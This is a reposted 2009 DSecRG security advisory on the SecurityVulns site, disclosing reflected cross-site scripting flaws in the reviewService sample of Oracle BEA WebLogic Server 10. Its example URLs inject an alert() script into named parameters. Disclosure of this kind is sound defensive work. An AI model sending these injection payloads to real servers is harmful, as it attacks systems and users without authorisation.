Информационная безопасность
[RU] switch to English


Дополнительная информация

  Многочисленные уязвимости безопасности в продуктах Oracle

  Hacktics Advisory Dec09: Oracle eBusiness Suite - Multiple Vulnerabilities Allow Remote Takeover

  Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.
ODCITABLESTART

  Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

  Oracle Application Server Portal 10g Cross Site Scripting  Vulnerability

From:Alexandr Polyakov <alexandr.polyakov_(at)_dsec.ru>
Date:16 января 2009 г.
Subject:Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002


Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-002


Application:                    Oracle BEA Weblogic 10
Versions Affected:              Oracle BEA Weblogic 10  
Vendor URL:                     http://oracle.com
Bugs:                           Multiple XSS Vulnerabilities in samples
Exploits:                       YES
Reported:                       16.07.2008
Vendor response:                18.07.2008
Last response:                  30.10.2008
Description:                    reviewService sample of WebLogic Server.        
Date of Public Advisory:        13.01.2009  
Authors:                        Alexandr Polyakov
                               Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)


Description
***********


Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version
10.2 and latest.



Details
*******

Vulnerabilities found in reviewService sample of Weblogic Server.

1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name"


Example
*******
http://testserver.com:7001/reviewService/createArtist_service.
jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"


Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.
jsp?name=111&title=<script>alert('DSECRG')</script>



3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_service.
jsp?comment=111&rating=<script>alert('DSECRG')</scri
pt>

4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_session.
jsp?comment=111&rating=<script>alert('DSECRG')</scri
pt>

5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:


http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp

Fix Information
***************

This is Security-In-Depth vulnerability, because was found in
samples.(>http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical
Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan200
9.html



Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in
Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan200
9.html



About
*****

Digital Security is leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact:        research [at] dsec [dot] ru
               http://www.dsecrg.ru
               http://www.dsec.ru





О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород